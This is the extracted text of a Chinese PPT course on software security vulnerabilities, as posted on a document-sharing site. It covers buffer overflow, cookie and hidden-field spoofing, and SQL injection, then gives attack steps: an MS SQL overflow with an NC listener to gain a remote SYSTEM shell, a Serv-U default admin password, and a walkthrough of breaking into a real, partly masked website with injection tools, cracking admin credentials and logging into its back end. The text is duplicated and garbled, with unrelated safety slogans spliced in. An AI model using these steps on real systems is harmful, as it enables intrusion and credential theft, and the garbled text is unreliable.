软件开发中常见的安全漏洞ppt课件

上传人:29 文档编号:240770980 上传时间:2024-05-06 格式:PPT 页数:29 大小:220.70KB
收藏 版权申诉 举报 下载
软件开发中常见的安全漏洞ppt课件_第1页
第1页 / 共29页
软件开发中常见的安全漏洞ppt课件_第2页
第2页 / 共29页
软件开发中常见的安全漏洞ppt课件_第3页
第3页 / 共29页
资源描述:

《软件开发中常见的安全漏洞ppt课件》由会员分享,可在线阅读,更多相关《软件开发中常见的安全漏洞ppt课件(29页珍藏版)》请在装配图网上搜索。

1、软件开发中的安全漏洞田宏政5/6/20241软件开发中的安全漏洞田宏政8/1/20231n安全漏洞难以完全避免n但是,有经验的开发人员一般软件中存在的安全漏洞会比较少n了解常见的软件开发中的安全漏洞对于开发安全的软件是很有帮助的5/6/20242安全漏洞难以完全避免8/1/20232漏洞的种类n软件设计错误n逻辑判断失误n缓冲区溢出nSQL注入nCookie修改n隐藏字段修改n跨站脚本攻击n。5/6/20243漏洞的种类软件设计错误8/1/20233缓冲区溢出型漏洞n缓冲区溢出型漏洞是计算机系统软件中极为常见的一类安全漏洞n包括 rpcdcom漏洞,ida&idq漏洞等在内的漏洞都属于这一类漏

2、洞n主要原因是由于C/C+语言中,对缓冲区的使用没有边界检测。因为在缓冲区的附近会有一些重要的数据结构。当输入的数据长度超出缓冲区的长度时,可能覆盖这些重要的数据结构,造成程序执行流程的改变。黑客通过仔细地分析这些数据结构,可以构造出特定的输入数据,当发生溢出时,会执行黑客输入的代码,达到攻击目标机器的目的5/6/20244缓冲区溢出型漏洞缓冲区溢出型漏洞是计算机系统软件中极为常见的一个会引起缓冲区溢出的C语言程序#include main()char buf40;/定义的缓冲区 scanf(“%s”,buf);/如果用户输入的内容长度大于40,将会导致缓冲区溢出 printf(“%s”,bu

3、f);5/6/20245一个会引起缓冲区溢出的C语言程序#include stdi当输入字符串长度超过预定长度的时候,缓冲区溢出,程序崩溃5/6/20246当输入字符串长度超过预定长度的时候,缓冲区溢出,程序崩溃8/n在Windows 2000 Server或者Windows 2003 Server上,默认情况下,发生溢出时没有出错信息,而只是自动关闭溢出的程序5/6/20247在Windows 2000 Server或者Windows n缓冲区溢出漏洞存在于c/c+以及以此为基础的编程语言n一般的溢出方法会导致程序停止运行,但仔细分析构造出的溢出数据可以让程序在溢出之后运行我们输入的代码n在

4、windows xp中,如果启用了 dep(数据执行保护)功能,可以减少缓冲区溢出的威胁5/6/20248缓冲区溢出漏洞存在于c/c+以及以此为基础的编程语言8/1入侵者如何利用缓冲区溢出漏洞?n发现漏洞n使用调试器分析地址n编写ShellCoden编写发送ShellCode的程序n如何寻找存在缓冲区溢出的漏洞程序是很困难的n如何利用这些漏洞也是困难的n对缓冲区溢出漏洞的熟悉程度,很大程度上可以说明黑客水平的高低5/6/20249入侵者如何利用缓冲区溢出漏洞?发现漏洞8/1/20239网站开发中常见的漏洞5/6/202410网站开发中常见的漏洞8/1/202310缺少必要的认证检查导致可以直接

5、访问动态网页导致入侵。n如一个网站,在一般的情况下需要通过 index.htm的一个链接而访问网页 b.asp。假设网页b.asp内有一些功能需要认证才能访问。但如果 b.asp缺少必要的代码检查是否通过正常的认证登录系统,则可能导致用户可以直接在浏览器地址栏输入 b.asp的地址而绕过系统正常的认证。5/6/202411缺少必要的认证检查导致可以直接访问动态网页导致入侵。如一个Cookie 欺骗造成的 Web入侵n有些系统将系统的认证信息直接保存与Cookie变量中。如果入侵值了解Cookie 的意义,则可以利用特殊的浏览器来伪造一个Cookie,对Web系统进行欺骗,使系统误认为是一个合法

6、的系统用户,从而可以越权访问系统的数据。n。5/6/202412Cookie 欺骗造成的 Web入侵有些系统将系统的认证信息隐藏字段欺骗n如果将认证等数据信息保存在网页的隐藏字段中,同样存在类似的问题例:5/6/202413隐藏字段欺骗如果将认证等数据信息保存在网页的隐藏字段中,同样Sql注入 n很多网站采用类似以下的代码进行用户认证nPassword=request(“password”)nSql=“select*from usertable where username=admin and password=”+password+“”nConn.open sql5/6/202414Sql注

7、入 很多网站采用类似以下的代码进行用户认证8/1/2n正常填写的时候,sql语句为nSelect*from usertable where username=admin and password=123456n但如果输入以下口令时,语句变为nSelect*from usertable wherenUsername=admin and password=123456 or 1=15/6/202415正常填写的时候,sql语句为8/1/202315MS SQL 漏洞n利用工具:SQL2(已有下载)n命令格式:sql2 远程IP 本地IP n说明:指在本机上用NC打开的监听端口;对SQL2000而言

8、有三个版本0,1,2n例:如果对方用的是MSSQL SP1,则可用如下命令进行溢出:qNC l p 53qSql2 200.200.200.200 53 15/6/202416MS SQL 漏洞利用工具:SQL2(已有下载)8/1/20入侵实例n思路:NC监听,漏洞溢出,建立连接n步骤:qNC监听:NC l p 250q漏洞溢出:sql2 192.168.245.137 192.168.245.1 250 0(或1,2依次来试)q建立连接:在NC监听端口上出现system32后说明双方已成功连接,并可以用管理员身份执行任何命令.5/6/202417入侵实例思路:NC监听,漏洞溢出,建立连接8/

9、1/20231在网页开发中防范SQL注入n不要轻易相信从客户端传递过来的数据,对客户端传递过来的数据进行严格的合法性检查n利用正则表达式对客户输入的数据进行合法性检查n一定要在服务端进行检查,不能仅仅在客户端进行检查5/6/202418在网页开发中防范SQL注入不要轻易相信从客户端传递过来的数据使用自动检测工具检测SQL注入漏洞n因为SQL注入是现在网站入侵的重要途径,因此出现了一些辅助自动测试工具,如NBSI,阿D注入检测工具n在网站开发中,可以利用这些自动检测工具进行辅助检测。但最重要的是对源码进行人工检查,确保客户端传输来的数据进行合法性检验5/6/202419使用自动检测工具检测SQL

10、注入漏洞因为SQL注入是现在网站入安全小标语安全小标语1:关注安全,平安是福;安全小标语:关注安全,平安是福;安全小标语2:安全连着你我他,:安全连着你我他,平安幸福靠大家;安全小标语平安幸福靠大家;安全小标语3:安全一个人,幸福一家人;安全小标语:安全一个人,幸福一家人;安全小标语4:安全科学技术也是第一生产力;安全小标语:安全科学技术也是第一生产力;安全小标语5:提高安全意识,倡导文明:提高安全意识,倡导文明风尚;安全小标语风尚;安全小标语6:生命至高无上,安全责任为天;安全小标语:生命至高无上,安全责任为天;安全小标语7:多:多看一眼安全保险,多防一步少出事故;安全小标语看一眼安全保险,

11、多防一步少出事故;安全小标语8:安全第一,预防为主;:安全第一,预防为主;安全小标语安全小标语9:你对违章讲人情,事故对你不留情;安全小标语:你对违章讲人情,事故对你不留情;安全小标语10:安全规程:安全规程系生产,自觉遵守是保障。安全小标贴系生产,自觉遵守是保障。安全小标贴1:物品不能堆这里,堵塞通道害自己;:物品不能堆这里,堵塞通道害自己;安全小标贴安全小标贴2:为了大家的安全和健康,请严格照章作业;安全小标贴:为了大家的安全和健康,请严格照章作业;安全小标贴3:请:请勿吸烟和携带火种,以免小火酿成大灾;安全小标贴勿吸烟和携带火种,以免小火酿成大灾;安全小标贴4:危险机械,请遵守操:危险机

12、械,请遵守操作规程;安全小标贴作规程;安全小标贴5:这里物品很危险,存储使用要小心;安全小标贴:这里物品很危险,存储使用要小心;安全小标贴6:未正确佩戴防护用具(品),谢绝入内;安全小标贴:未正确佩戴防护用具(品),谢绝入内;安全小标贴7:高空作业有坠落:高空作业有坠落危险,请您务必系好安全带;安全小标贴危险,请您务必系好安全带;安全小标贴8:工具用后请归位,以免用时无处:工具用后请归位,以免用时无处寻;安全小标贴寻;安全小标贴9:消防设施,器材和标志不得移位;安全小标贴:消防设施,器材和标志不得移位;安全小标贴10:地:地面湿滑,小心跌到;安全小标贴面湿滑,小心跌到;安全小标贴11:危险场所

13、,:危险场所,5/6/202420安全小标语1:关注安全,平安是福;安全小标语2:安全Serv-U FTP 服务器漏洞n该软件常用于在网内建立FTP服务器n漏洞原理:q该服务器默认以”本地系统账户”的权限运行,导致普通用户也能利用这个”本地系统账户”来执行系统命令q存在一个用户名为”LocalAdnimistrator”,密码为#1$ak#.1k;0P的默认管理员账号,且密码固定(只能通过连接到本地的127.0.0.1:43958端口进行登录),从而留下隐患5/6/202421Serv-U FTP 服务器漏洞该软件常用于在网内建立FTP漏洞利用n本漏洞的检测与利用参见教材P199-2005/6

14、/202422漏洞利用本漏洞的检测与利用参见教材P199-2008/1/2实例:SQL注入攻击实战一、工具下载下载来的这个工具包中总有两个小程序:wed.exe和wis.exe,其中wis.exe是用来扫描某个站点中是否存在SQL注入漏洞的;wed.exe则是用来破解SQL注入用户名密码的。两个工具的使用都非常简单,结合起来,就可以完成从寻找注入点到注入攻击完成的整个过程。5/6/202423实例:SQL注入攻击实战一、工具下载8/1/202323n二、寻找SQL注入点n“wis.exe”使用的格式如下:“wis.exe 网址”,例如:首先打开命令提示窗口,输入如下命令:wis.exe htt

15、p:/www.as.*.cn/。n小提示:在输入网址时,前面的http:/;和最后面的/是必不可少的,否则将会提示无法进行扫描。n输入完毕后回车,即可开始进行扫描了。很快得到了扫描结果,可以看到这个网站中存在着很多SQL注入漏洞,我们随便挑其中一个来做试验,就挑/rjz/sort.asp?classid=1吧。n打开浏览器,在地址栏中输入http:/www.as.*.cn/rjz/sort.asp?classid=1,打开了网站页面,呵呵,原来是一个下载网页。现在来对它进行SQL注入,破解出管理员的帐号来吧!5/6/202424二、寻找SQL注入点8/1/202324三、SQL注入破解管理员帐

16、号 现在进入命令窗口中,使用刚才下载的工具包中的wed.exe程序,命令使用格式为:wed.exe 网址输入如下命令:wed.exe http:/www.as.*.cn/rjz/sort.asp?classid=1。回车后可看到命令运行情况。小提示:这次输入网址时,最后面千万不要加上那个小提示:这次输入网址时,最后面千万不要加上那个/,但前面的,但前面的http:/;头也还是必不可少的。头也还是必不可少的。可以看到程序自动打开了工具包中的几个文件,C:wedwedTableName.dic、C:wedwedUserField.dic和C:wedwedPassField.dic,这几个文件分别是

17、用来破解用户数据库中的字表名、用户名和用户密码所需的字典文件。当然我们也可以用其它的工具来生成字典文件,不过想想小榕哥以前出的黑客字典那么的强大,还用得着去多此一举吗?5/6/202425三、SQL注入破解管理员帐号 现在进入命令窗口中,在破解过程中还可以看到SQL Injection Detected.的字符串字样,表示程序还会对需要注入破解的网站进行一次检测,看看是否存在SQL注入漏洞,成功后才开始猜测用户名。开始等待吧!呵呵,很快就获得了数据库表名admin,然后得到用户表名和字长,为username和6;再检测到密码表名和字长,为password和8。看来用户的密码还起得挺长的呢,如果

18、手工破解出这个用户密码来,一定要花上不少时间的!正想着手工注入会有多困难时,wed.exe程序已经开始了用户名和密码的破解。很快的,就得到了用户名和密码了admina、pbk&7*8r!天啦,这也太容易了吧!还不到一分钟呢5/6/202426 在破解过程中还可以看到SQL Inject四、搜索隐藏的管理登录页面 重新回到刚才的软件下载页面中,任意点击了一个软件下载链接,哎呀?怎么可以随便下载的呢!不像以前碰到的收费网站,要输入用户名和密码才可以下载。看来这是免费下载的网站,我猜错了攻击对象,不过既然都来了,就看看有没有什么可利用的吧?拿到了管理员的帐号,现在看来我们只有找到管理员登录管理的入口

19、才行了。在网页上找遍了也没有看到什么管理员的入口链接,看来还是得让榕哥出手啦!再次拿出wis.exe程序,这个程序除了可以扫描出网站中存在的所有SQL注入点外,还可以找到隐藏的管理员登录页面。在命令窗口中输入wis.exe http:/www.as.*.cn/rjz/sort.asp?classid=1/a。注意这里输入了一个隐藏的参数/a。5/6/202427四、搜索隐藏的管理登录页面 重新回到刚才的软件下 怎么会扫描不成功呢?呵呵,原来这是扫描注入点,当然不能成功了,管理员登录页面只可能隐藏在整个网站的某个路径下。于是输入wis.exe http:/www.as.*.cn/a,对整个网站进

20、行扫描。注意扫描语句中网址的格式。程序开始对网站中的登录页面进行扫描,在扫描过程中,找到的隐藏登录页面会在屏幕上以红色进行显示。很快就查找完了,在最后以列表显示在命令窗口中。可以看到列表中有多个以/rjz/开头的登录页面网址,包括/rjz/gl/manage.asp、/rjz/gl/login.asp、/rjz/gl/admin1.asp等。就挑/rjz/gl/admin1.asp吧,反正这些都是管理员登录的页面想用哪个都可以。在浏览器中输入网址 http:/www.as.*.cn/rjz/gl/admin1.asp,呵呵,出现了本来隐藏着的管理员登录页面。输入用户名和密码,就进入到后台管理系统,进来了做些什么呢?当然不能搞破坏啦,看到有一个添加公告的地方,好啊,就在这儿给管理员留下一点小小的通知吧!5/6/202428 怎么会扫描不成功呢?呵呵,原来这是扫描注入点作业布置n作业内容为FTP上的”作业2”5/6/202429作业布置作业内容为FTP上的”作业2”8/1/202329

展开阅读全文
温馨提示:
1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
2: 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
3.本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!